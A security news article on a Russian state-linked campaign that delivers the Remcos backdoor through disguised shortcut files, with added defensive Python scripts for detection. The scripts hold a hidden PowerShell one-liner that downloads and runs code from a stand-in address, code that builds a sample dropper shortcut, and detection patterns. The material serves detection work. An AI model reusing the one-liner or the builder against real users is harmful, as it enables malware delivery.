Russian Hackers Target Ukraine With Stealthy Malware Attack
A Russia-backed campaign is using deceptive documents to hack Ukraine-linked targets. Here's how the malware works and what defenders should watch for.

At first glance, it looks like an ordinary Office document. The filename might mention troop movements or a Ukrainian official’s name. It’s inside a ZIP file, maybe even accompanied by a decoy doc that opens without issue. But double-click it, and you’re not opening a report, you’re triggering the next stage of a stealthy malware delivery chain.
That’s the tactic observed by Cisco Talos in a recently uncovered campaign by Gamaredon, the Russian state-linked threat group that’s been actively targeting Ukrainian entities since 2013. This time, the group is leveraging malicious Windows shortcut files (.LNK) to deliver the Remcos backdoor, a commercially available remote access tool.
Talos has been tracking the campaign since at least November 2024, and while the technical components may be familiar, the execution is anything but sloppy. From the use of war-themed lure filenames to geo-fenced payload delivery, this campaign reflects how even simple tools can be highly effective when paired with context-aware targeting and reliable infrastructure.
Familiar Themes, Updated Execution
Gamaredon has repeatedly used the invasion of Ukraine as bait in its phishing campaigns, and this one is no exception. Many of the malicious LNK files in this campaign are disguised with filenames referencing Ukrainian or Russian individuals, battlefield data, or troop activity. For example:
| Original Name | Translation |
|---|---|
| 3079807576 (Шашило О.В)/ШАШИЛО Олександр Віталійович.docx.lnk | 3079807576 (Shashilo O.V)/SHASHILO Oleksandr Vitaliyovich.docx.lnk |
| 3151721177 (Рибак С.В)/РИБАК Станіслав Вікторович.docx.lnk | 3151721177 (Rybak S.V)/RYBAK Stanislav Viktorovich.docx.lnk |
| 3407607951 (Жолоб В.В)/ЖОЛОБ Владислав Вікторович.docx.lnk | 3407607951 (Zholob V.V)/ZHOLOB Vladislav Viktorovich.docx.lnk |
| 3710407173 (Гур'єв П.А)/ГУР'ЄВ Павло Андрійович.docx.lnk | 3710407173 (Gur'ev P.A)/GUR'EV Pavlo Andriyovich.docx.lnk |
| Вероятное расположение узлов связи, установок РЭБ и расчетов БПЛА противника. ЮГ КРАСНОАРМЕЙСКА.docx.lnk | Probable location of enemy communication nodes, electronic warfare systems and UAV crews. SOUTH OF KRASNOARMEYSK.docx.lnk |
| ГУР'ЄВ Павло Андрійович.docx.lnk | GUR'EV Pavlo Andriyovich.docx.lnk |
| Координаты взлетов противника за 8 дней (Красноармейск).xlsx.lnk | Coordinates of enemy takeoffs over 8 days (Krasnoarmeysk).xlsx.lnk |
| Позиции противника запад и юго-запад.xlsx.lnk | Enemy positions west and south-west.xlsx.lnk |
| РИБАК Станіслав Вікторович.docx.lnk | RYBAK Stanislav Viktorovich.docx.lnk |
| ШАШИЛО Олександр Віталійович.docx.lnk | SHASHILO Oleksandr Vitaliyovich.docx.lnk |
These files are typically compressed into ZIP archives to bypass email filters, and the metadata embedded in the LNK files shows they were created on just two machines, a consistent pattern for Gamaredon.
Once opened, the LNK files execute PowerShell code designed to reach out to attacker-controlled infrastructure and download a ZIP file containing the next-stage payload.
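As an added example (not code from Cisco Talos or this article), the following Python script parses a .lnk file according to the public MS-SHLLINK layout, extracts its target and command line, and scans a ZIP attachment for shortcuts hiding behind document extensions. The shortcut, decoy document and archive are constructed in memory; the PowerShell path, switches and the 203.0.113.10 URL are illustrative assumptions, not indicators from the campaign. The same script covers the "scan for .lnk files in attachments and ZIPs" item in the mitigation list at the end of the article.

```python
"""Triage Windows shortcut (.lnk) files found in a ZIP attachment.

Added example (not Cisco Talos' or this article's code). Field layout follows
the public MS-SHLLINK specification; the shortcut, decoy and archive are built
in memory, and the PowerShell path, switches and 203.0.113.10 URL are
illustrative assumptions rather than indicators from the campaign.
"""
import io
import re
import struct
import zipfile

LNK_CLSID = bytes.fromhex("0114020000000000C000000000000046")   # {00021401-...-46}
HAS_ID_LIST, HAS_LINK_INFO, IS_UNICODE = 0x01, 0x02, 0x80
STRING_FIELDS = [(0x04, "name"), (0x08, "relative_path"), (0x10, "working_dir"),
                 (0x20, "arguments"), (0x40, "icon_location")]   # on-disk order
SCRIPT_HOSTS = ("powershell", "pwsh", "cmd.exe", "mshta", "wscript", "cscript", "rundll32")


def parse_lnk(data: bytes) -> dict:
    """ShellLinkHeader -> [LinkTargetIDList] -> [LinkInfo] -> StringData."""
    if len(data) < 76 or struct.unpack_from("<I", data, 0)[0] != 0x4C or data[4:20] != LNK_CLSID:
        raise ValueError("not a Shell Link (.lnk) file")
    flags = struct.unpack_from("<I", data, 20)[0]
    off = 76
    if flags & HAS_ID_LIST:                       # IDListSize (2 bytes) + IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:                     # LinkInfoSize includes itself
        off += struct.unpack_from("<I", data, off)[0]
    unicode = bool(flags & IS_UNICODE)
    out = {"flags": flags}
    for bit, name in STRING_FIELDS:              # CountCharacters + chars, no NUL
        if flags & bit:
            count = struct.unpack_from("<H", data, off)[0]
            off += 2
            raw = data[off:off + (count * 2 if unicode else count)]
            off += len(raw)
            out[name] = raw.decode("utf-16-le") if unicode else raw.decode("cp1252")
    return out


def lnk_reasons(info: dict) -> list:
    """Why a parsed shortcut looks like a dropper rather than a document link."""
    text = (info.get("relative_path", "") + " " + info.get("arguments", "")).lower()
    reasons = []
    if any(h in text for h in SCRIPT_HOSTS):
        reasons.append("shortcut launches a script host")
    if re.search(r"-(w|windowstyle)\s+hidden|-(nop|noprofile)\b|-(ep|executionpolicy)\s+bypass", text):
        reasons.append("hidden/unrestricted PowerShell switches")
    if re.search(r"get-command|\bgcm\b|\biex\b|invoke-expression|downloadstring|https?://", text):
        reasons.append("download or eval primitive in arguments")
    return reasons


def scan_zip(blob: bytes) -> list:
    """Return [(member, reasons)] for every .lnk inside the archive."""
    findings = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for member in zf.namelist():
            if not member.lower().endswith(".lnk"):
                continue
            reasons = []
            if re.search(r"\.(docx?|xlsx?|pdf)\.lnk$", member, re.I):
                reasons.append("double extension disguises a shortcut as a document")
            try:
                reasons += lnk_reasons(parse_lnk(zf.read(member)))
            except ValueError as exc:
                reasons.append(str(exc))
            findings.append((member, reasons))
    return findings


# --- constructed sample data (assumptions, not campaign artefacts) -------------
TARGET = r"..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
ARGS = ('-w hidden -nop -ep bypass -c "&(Get-Command i*x) '
        "((New-Object Net.WebClient).DownloadString('http://203.0.113.10/s2.zip'))\"")


def build_sample_lnk(target: str, args: str) -> bytes:
    """Minimal Unicode shortcut: header, empty IDList, RELATIVE_PATH + ARGUMENTS."""
    flags = HAS_ID_LIST | IS_UNICODE | 0x08 | 0x20
    header = struct.pack("<I16sIIQQQIIIHHII", 0x4C, LNK_CLSID, flags, 0x20,
                         0, 0, 0, 0, 0, 7, 0, 0, 0, 0)   # ShowCommand 7 = minimised
    id_list = struct.pack("<HH", 2, 0)                   # IDListSize=2, TerminalID
    strings = b"".join(struct.pack("<H", len(s)) + s.encode("utf-16-le") for s in (target, args))
    return header + id_list + strings


def build_sample_zip() -> bytes:
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("decoy.docx", b"placeholder decoy document")
        zf.writestr("Позиции противника запад и юго-запад.xlsx.lnk", build_sample_lnk(TARGET, ARGS))
    return buf.getvalue()


if __name__ == "__main__":
    for member, reasons in scan_zip(build_sample_zip()):
        print(member, "->", "; ".join(reasons) or "no findings")
```

Pointing scan_zip at a real attachment is a matter of reading the file bytes; the parser deliberately walks the optional IDList and LinkInfo blocks so it does not mis-read the string data in shortcuts that carry a full target ID list, which is what Explorer-created shortcuts normally have.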
This campaign continues the trend of Russian-aligned groups exploiting familiar platforms and emotional triggers. In a similar case, attackers recently targeted Signal’s messaging features to conduct espionage, abusing trust in secure communication tools.
Staging & Payload Delivery
[Image omitted; source: Cisco Talos]
The PowerShell downloader obfuscates its commands with Get-Command, resolving cmdlet names at runtime rather than writing them out, to evade string-based detection. It connects to servers located in Russia and Germany, but Cisco notes that the infrastructure is geo-fenced: requests that do not originate from specific Ukrainian regions receive HTTP 403 responses. Public sandboxes such as Any.run therefore report the payloads as unavailable, while samples retrieved from the targeted locations confirm the downloads were being served.
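To make the Get-Command trick concrete, here is an added Python example (not the Talos script) that resolves the wildcard patterns an obfuscated script feeds to Get-Command back to the cmdlet they name, and rewrites the call so the script reads plainly. The specific call forms it handles (`&(Get-Command i*x)`, the `gcm` alias, `-Name` with quotes) and the short cmdlet table are assumptions for illustration; an analyst would populate the table from `Get-Command` on a reference host.

```python
"""Resolve the Get-Command wildcard trick back to the cmdlet it hides.

Added example, not the Talos downloader. `&(Get-Command i*x)` asks PowerShell
to look up every command matching the wildcard and invokes the result, so the
script never contains the string "Invoke-Expression" or "iex". This resolver
applies the same wildcard match against a (constructed, deliberately short)
command table and rewrites the call so the rest of the script reads plainly.
The exact call forms handled are assumptions for illustration.
"""
import fnmatch
import re

# Constructed excerpt of real cmdlet and alias names; load the full table from
# `Get-Command | Select-Object -ExpandProperty Name` on a reference host.
KNOWN_COMMANDS = [
    "Invoke-Expression", "iex", "Invoke-WebRequest", "iwr", "Invoke-RestMethod",
    "Invoke-Command", "Invoke-Item", "Start-Process", "Expand-Archive",
    "New-Object", "Get-Command", "gcm", "Set-Content", "Add-Type", "Get-Date",
]
HIGH_RISK = {"invoke-expression", "iex", "invoke-webrequest", "iwr",
             "invoke-restmethod", "start-process", "expand-archive"}

# &(Get-Command i*x)   .(gcm 'I*n-E*n')   &(Get-Command -Name "*ke-Ex*")
GETCMD_RE = re.compile(
    r"""[&.]\s*\(\s*(?:get-command|gcm)\s+(?:-name\s+)?['"]?([^\s'")]+)['"]?\s*\)""",
    re.IGNORECASE)


def resolve_pattern(pattern: str, commands=KNOWN_COMMANDS) -> list:
    """PowerShell wildcards (*, ?, [..]) are case-insensitive: fnmatch on lowercase."""
    pat = pattern.lower()
    return [c for c in commands if fnmatch.fnmatchcase(c.lower(), pat)]


def deobfuscate(script: str) -> tuple:
    """Return (rewritten script, findings); a finding is (pattern, candidates).

    A pattern that resolves to exactly one command is inlined, which is also
    the only case in which the attacker's `&(...)` runs without error.
    """
    findings = []

    def replace(m):
        candidates = resolve_pattern(m.group(1))
        findings.append((m.group(1), candidates))
        return candidates[0] if len(candidates) == 1 else m.group(0)

    return GETCMD_RE.sub(replace, script), findings


def is_downloader(script: str) -> bool:
    """True when a hidden call resolves to an eval/download cmdlet, or a
    download primitive is visible once the indirection is removed."""
    rewritten, findings = deobfuscate(script)
    resolved = {c.lower() for _, cands in findings for c in cands}
    return bool(resolved & HIGH_RISK) or "downloadstring" in rewritten.lower()


# Constructed sample in the style of an LNK-launched one-liner (203.0.113.10 is
# a documentation address, not a campaign indicator).
SAMPLE = ("$u='http://203.0.113.10/s2.zip';"
          "&(Get-Command i*x) ((New-Object Net.WebClient).DownloadString($u))")

if __name__ == "__main__":
    rewritten, findings = deobfuscate(SAMPLE)
    for pattern, cands in findings:
        print(f"Get-Command {pattern!r} -> {cands}")
    print(rewritten)
    print("downloader:", is_downloader(SAMPLE))
```

The same idea generalises to other name-building tricks (string concatenation, `-join`, character arithmetic): evaluate the indirection the way PowerShell would, then match the resolved name against a list of eval and download primitives, instead of grepping the raw script for literals the attacker has already removed.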
The second-stage ZIP file, once retrieved, contains a mix of:
A clean executable
A malicious DLL used for DLL sideloading
Decoy documents to mask infection
Gamaredon uses the clean binary to trigger the DLL, which in turn decrypts and executes Remcos — giving the attacker remote access to the compromised machine.
The use of deceptive file types and region-aware delivery mirrors tactics seen in other Russian campaigns. One recent operation abused malicious RDP files to gain access to internal networks, reinforcing how common file formats are weaponized at scale.
Infrastructure Breakdown
The campaign’s C2 and payload infrastructure is hosted across multiple providers, primarily:
GTHost (ASN 63023)
HyperHosting (ASN 60602)
Cisco Talos also noted that the attackers' IP addresses carry reverse DNS records that are invalid but distinctive, which let analysts pivot to additional IP addresses matching the same infrastructure profile.
Some key IPs involved:
146.185.233.96
80.66.79.91
81.19.131.95
These IPs served payloads and decoy documents, and at least one also functioned as a Remcos command-and-control (C2) server.
Tooling: Remcos, PowerShell, and Sideloading
Remcos is not new to the scene. It’s a commercial remote access tool (RAT) often abused by threat actors for command execution, screen capture, keylogging, and data exfiltration.
In this campaign, Remcos is deployed via a DLL sideloading method. The clean executable serves as a launcher, while the malicious DLL handles decryption and payload execution. Some of the clean applications used to facilitate this include:
TivoDiag.exe
Mp3tag.exe
palemoon.exe
Compil32.exe
[Image omitted; source: Cisco Talos]
These files are packaged with the LNK payloads in folders named SysDrive/ or Drvx64/ and are extracted to the %TEMP% directory during execution.
The final Remcos binary is injected into explorer.exe and communicates with the attacker's C2 server over port 6856.
Attribution and Consistency
Cisco assesses with medium confidence that the activity is tied to Gamaredon, based on:
Reuse of LNK metadata creation machines seen in past Gamaredon campaigns
The Ukrainian targeting
Infrastructure overlaps
The group has a long history of using low-complexity but high-impact tactics, typically favoring custom tools and fast-moving phishing campaigns. The use of Remcos in this case marks a shift toward leveraging widely available tooling to reduce operational overhead while maintaining access capabilities.
Operational Insights
Gamaredon’s campaign highlights several enduring challenges in threat detection:
Shortcut abuse remains under-monitored in many environments
DLL sideloading continues to be a reliable method of evading AV
Geo-fencing payload delivery frustrates sandboxing and intel sharing
The fact that such a targeted campaign is built around commodity malware and public infrastructure speaks volumes about both attacker adaptability and defensive blind spots.
Defending Against This Campaign
Cisco has released IOCs for this campaign on GitHub, including:
IPs and domains
Sample filenames
Associated executables and DLL hashes
For defenders, mitigations should include:
Blocking the known IPs and reviewing DNS logs for any related domains
Scanning for .lnk files in email attachments and inside ZIP archives, especially double-extension names such as .docx.lnk or .xlsx.lnk
Auditing %TEMP% directories for the clean-executable-plus-DLL pairs used for sideloading
Restricting PowerShell with application control (AppLocker or WDAC) and Constrained Language Mode, and enabling script block logging; execution policy on its own is not a security boundary, since a shortcut can simply pass -ExecutionPolicy Bypass
Using EDR to monitor for suspicious child processes of explorer.exe, such as hidden PowerShell, and for explorer.exe itself making outbound connections
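The following is an added Python example (not a Talos or Vulnerable U detection) that turns the chain described in the tooling section and the EDR item above into rules run over Sysmon-style events: hidden PowerShell spawned by explorer.exe (the shortcut launch), one of the named clean executables running from %TEMP%, an unsigned DLL loaded from that same folder (the sideload), and explorer.exe connecting to the C2 port. The event shape and the sample events are constructed; the executable names, port 6856 and the IPs are the ones listed in this article, and helper.dll is a placeholder name.

```python
"""Rule-based triage of Sysmon-style events for the chain described above:
explorer.exe -> hidden PowerShell (the LNK), clean host EXE run from %TEMP%,
unsigned DLL loaded from the same folder (sideloading), explorer.exe talking
to a C2 port.

Added example, not a Talos or Vulnerable U detection. Event shape (Sysmon
EventID 1 process create, 7 image load, 3 network connect, with Sysmon field
names) and the sample events are constructed; the host EXE names, TCP port
6856 and the IPs are taken from the article. helper.dll is a placeholder.
"""
import ntpath
import re

SIDELOAD_HOSTS = {"tivodiag.exe", "mp3tag.exe", "palemoon.exe", "compil32.exe"}  # article
C2_PORT = 6856                                                                   # article
KNOWN_IPS = {"146.185.233.96", "80.66.79.91", "81.19.131.95"}                     # article
USER_WRITABLE = re.compile(r"\\(temp|tmp|downloads|public)\\", re.I)
LNK_STYLE_ARGS = re.compile(
    r"-(w|windowstyle)\s+hidden|-(ep|executionpolicy)\s+bypass|get-command|\bgcm\b", re.I)


def base(path: str) -> str:
    return ntpath.basename(path).lower()


def triage(events: list) -> list:
    """Return (rule, summary, event) for each event that matches a rule."""
    hits = []
    for ev in events:
        eid, image = ev["EventID"], ev.get("Image", "")
        name = base(image)
        if eid == 1:
            parent = base(ev.get("ParentImage", ""))
            if (parent == "explorer.exe" and name in {"powershell.exe", "pwsh.exe"}
                    and LNK_STYLE_ARGS.search(ev.get("CommandLine", ""))):
                hits.append(("lnk-launch", "hidden PowerShell spawned by explorer.exe", ev))
            if name in SIDELOAD_HOSTS and USER_WRITABLE.search(image):
                hits.append(("sideload-host", f"{name} run from a user-writable path", ev))
        elif eid == 7:
            dll = ev.get("ImageLoaded", "")
            same_dir = ntpath.dirname(dll).lower() == ntpath.dirname(image).lower()
            if same_dir and USER_WRITABLE.search(dll) and ev.get("Signed", "false").lower() != "true":
                hits.append(("sideload", f"unsigned {base(dll)} loaded beside {name}", ev))
        elif eid == 3:
            ip, port = ev.get("DestinationIp", ""), int(ev.get("DestinationPort", 0))
            if name == "explorer.exe" and (port == C2_PORT or ip in KNOWN_IPS):
                hits.append(("c2", f"explorer.exe -> {ip}:{port}", ev))
            elif ip in KNOWN_IPS:
                hits.append(("ioc-ip", f"{name} -> {ip}:{port}", ev))
    return hits


# Constructed sample events (field names follow Sysmon; values are illustrative).
TEMP = r"C:\Users\alice\AppData\Local\Temp\Drvx64"
SAMPLE_EVENTS = [
    {"EventID": 1, "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": 'powershell.exe -w hidden -nop -c "&(Get-Command i*x) (New-Object Net.WebClient).DownloadString($u)"'},
    {"EventID": 1, "Image": TEMP + r"\TivoDiag.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "TivoDiag.exe"},
    {"EventID": 7, "Image": TEMP + r"\TivoDiag.exe",
     "ImageLoaded": TEMP + r"\helper.dll", "Signed": "false"},
    {"EventID": 3, "Image": r"C:\Windows\explorer.exe",
     "DestinationIp": "146.185.233.96", "DestinationPort": "6856"},
    # benign: the same application installed normally, and ordinary browser traffic
    {"EventID": 1, "Image": r"C:\Program Files\Mp3tag\Mp3tag.exe",
     "ParentImage": r"C:\Windows\explorer.exe", "CommandLine": "Mp3tag.exe"},
    {"EventID": 3, "Image": r"C:\Program Files\Mozilla Firefox\firefox.exe",
     "DestinationIp": "203.0.113.5", "DestinationPort": "443"},
]

if __name__ == "__main__":
    for rule, summary, _ in triage(SAMPLE_EVENTS):
        print(f"[{rule}] {summary}")
```

The IP and port rules are the brittle part, since infrastructure rotates; the behavioural rules (explorer.exe spawning hidden PowerShell, a signed benign binary executing from a user-writable folder and loading an unsigned DLL from that same folder, explorer.exe opening outbound sockets) survive a change of hosting provider and are the ones worth promoting to EDR detections.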
Whether it’s email-based malware or social engineering attacks, the goal is still credential access and foothold establishment. Another active campaign recently used device code phishing tactics to compromise cloud-based accounts, bypassing traditional MFA defenses.
Gamaredon’s latest wave shows that even well-worn techniques, when delivered with regional nuance and infrastructure discipline, still get results. For Ukrainian targets, and those supporting them, the threat is ever changing and we need to stay on top of these tactics.
Stay tuned to Vulnu for ongoing coverage of state-aligned threats, malware distribution tactics, and intelligence-driven defense strategies.